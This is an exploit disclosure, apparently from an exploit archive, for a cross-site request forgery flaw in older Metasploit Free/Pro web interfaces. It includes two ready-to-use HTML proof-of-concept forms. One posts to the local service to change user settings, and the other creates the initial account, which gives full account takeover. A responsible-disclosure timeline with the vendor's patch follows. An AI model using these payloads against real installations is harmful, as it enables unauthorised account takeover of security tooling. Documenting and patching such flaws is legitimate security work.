# Exploit Title: Metasploit Project initial User Creation CSRF# Google Dork: N/A# Date: 14-2-2015# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)# Vendor Homepage: http://www.metasploit.com/# Software Link:
http://www.rapid7.com/products/metasploit/editions-and-features.jsp
# Version: Free/Pro < 4.11.1 (Update 2015021901)# Tested on: All OS# CVE : N/A
Vulnerability:
Cross Site Request Forgery -(CSRF)
Info:
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
More Details:
After doing some research, i have found that the anti csrf token
"authenticity_token" value is not validated from the local server side
which will result in a more csrf attack scenario around the whole local
metasploit project.
Affected URL(s)/PoC Code(s):
-Change Local Metasploit Project User Settings
<html>
<body>
<form action="https://127.0.0.1:3790/users/1" method="POST">
<input type="hidden" name="utf8" value="✓"/>
<input type="hidden" name="_method" value="put"/>
<input type="hidden" name="authenticity_token" value=""/>
<input type="hidden" name="user[fullname]" value="Attacker"/>
<input type="hidden" name="user[email]" value="EMAIL"/>
<input type="hidden" name="user[company]" value="COMPANY"/>
<input type="hidden" name="user[time_zone]" value="Cairo"/>
<input type="hidden" name="commit" value="Save Settings"/>
<input type="submit" value="Submit form"/>
</form>
</body>
</html>
-Full Local Metasploit Project Account Takeover before setting up the first
user settings
<html>
<body>
<form action="https://127.0.0.1:3790/users" method="POST">
<input type="hidden" name="utf8" value="✓"/>
<input type="hidden" name="authenticity_token" value=""/>
<input type="hidden" name="user[username]" value="Username"/>
<input type="hidden" name="user[password]" value="PASSWORD"/>
<input type="hidden" name="user[password_confirmation]"
value="PASSWORD"/>
<input type="hidden" name="user[fullname]" value="FUll_Name"/>
<input type="hidden" name="user[email]" value="EMAIL"/>
<input type="hidden" name="user[company]" value="COMPANY"/>
<input type="hidden" name="user[time_zone]" value="Cairo"/>
<input type="hidden" name="commit" value="Create Account"/>
<input type="submit" value="Submit form"/>
</form>
</body>
</html>
More Details/Impact:
-Change Local Metasploit Project User Settings
-Full Local Metasploit Project Account Takeover before setting up the first
user settings
Report Timeline:
[-] 14/02/2015: Reported to Rapid7 Security Team
[-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability
[-] 17/02/2015: Reply from"Eray Yilmaz" about the Operation and public
disclosure rules
[-] 20/02/2015: Reply from"Eray Yilmaz" about releasing a patch for the
vulnerability in place, Fixed in Update 4.11.1 (Update 2015021901),
https://community.rapid7.com/docs/DOC-3010
[-] 16/03/2015: Public Disclosure
Thanks
--*Best Regards**,**,**Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist
& Bug Bounty Hunter.
LinkedIn
<https://www.linkedin.com/in/symbiansymoh>Curriculum Vitae
<http://goo.gl/cNrVpL>
<https://www.linkedin.com/in/symbiansymoh>Facebook
<https://fb.com/symbiansymoh>Twitter
<https://twitter.com/symbiansymoh>